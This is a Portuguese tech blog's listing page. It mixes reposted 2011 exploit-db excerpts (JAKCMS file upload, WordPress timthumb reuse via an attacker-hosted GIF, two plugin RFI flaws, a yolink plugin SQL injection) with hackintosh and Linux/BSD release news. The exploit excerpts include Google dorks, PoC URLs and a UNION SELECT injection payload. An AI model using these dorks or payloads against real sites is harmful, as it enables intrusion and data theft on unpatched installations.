Nosso Blog
# Exploit Title: JAKCMS PRO < = 2.2.5 Remote Arbitrary File Upload Exploit # Google Dork: "Powered By JAKCMS" # Date: 21/09/2011 # Author: EgiX # Software Link: http://www.jakcms.com/ # Version: 2.2.5 # Tested on: Windows 7 and Debian 6.0.2 Fonte: http://www.exploit-db.com/exploits/17882/
# Exploit Title: Multiple WordPress timthumb.php reuse vulnerabilities # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) — Description — The following WordPress plugins reuse a vulnerable version of the timthumb.php library. By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled domain such as blogger.com.evil.com …
Sense of Security – Security Advisory – SOS-11-010 Release Date. 19-Sep-2011 Last Update. – Vendor Notification Date. 21-Feb-2011 Product. Cisco TelePresence Series Platform. Cisco Affected versions. C < = TC4.1.2, MXP
# Exploit Title: Relocate Upload WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/relocate-upload # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/ # Version: 0.14 (tested) — PoC — http://SERVER/db_unx_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI — Vulnerable Code — // Move folder request handled when called by GET AJAX if (isset($_GET[‘ru_folder’])) { // WP setup …
# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI # Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget # Date: 09/19/2011 # Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing) # Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/ # Version: 1.36 (tested) — PoC — http://SERVER/db_unx_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work) — Vulnerable Code — if (isset($_FILES[‘wpmm-upload’])) { …
Boa noite grandes mestres, só estamos postando esta informação extra para deixar o coração dos amantes de hackintosh mais tranquilizados. Fizemos, neste instante todas as updates disponíveis pela apple na arquitetura 10.7.1 (current) em cima do seguinte hardware: Cpu – 2160 (intel dual core), 2 gb de ram ddr 800, VGA nvidia 8500gt, P5KPL-AM SE …
Olá galera… tudo na paz? Vixe, muito tempo sem escrever aqui galera….. Mas é por uma nobre causa….. tenho me esforçado ao máximo para adquirir conhecimentos que facilitem as explicações e melhorem os artigos a vocês nossos leitores….. hoje eu queria esclarecer alguns aspectos que considero fundamentais ao entusiastas ao mundo hackintosh….. Não quero ser …
Ken Smith has announced the availability of the second beta of FreeBSD 9.0, more than a month later than planned: “The second beta build of the 9.0-RELEASE release cycle is now available. Note: the location of the FTP install tree and ISOs have changed slightly. What we used for BETA2 reflects a directory structure that …
Bryen Yunashko has announced the availability of the third milestone release of openSUSE 12.1: “openSUSE 12.1’s milestone 5 is now ready for download. Here are some interesting things you can expect to see when you try milestone 5: further changes have been made to systemd which replaces the SysInitV system, the default is …
# Exploit Title: WordPress yolink Search plugin < = 1.1.4 SQL Injection Vulnerability # Date: 2011-08-30 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/yolink-search.1.1.4.zip # Version: 1.1.4 (tested) --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/yolink-search/includes/bulkcrawl.php page=-1&from_id=-1 UNION ALL SELECT CONCAT_WS(CHAR(58),database(),version(),current_user()),NULL--%20&batch_size=-1 --------------- Vulnerable code --------------- $post_type_in = array(); if( isset( $_POST['page'] ) ) { $post_type_in[] …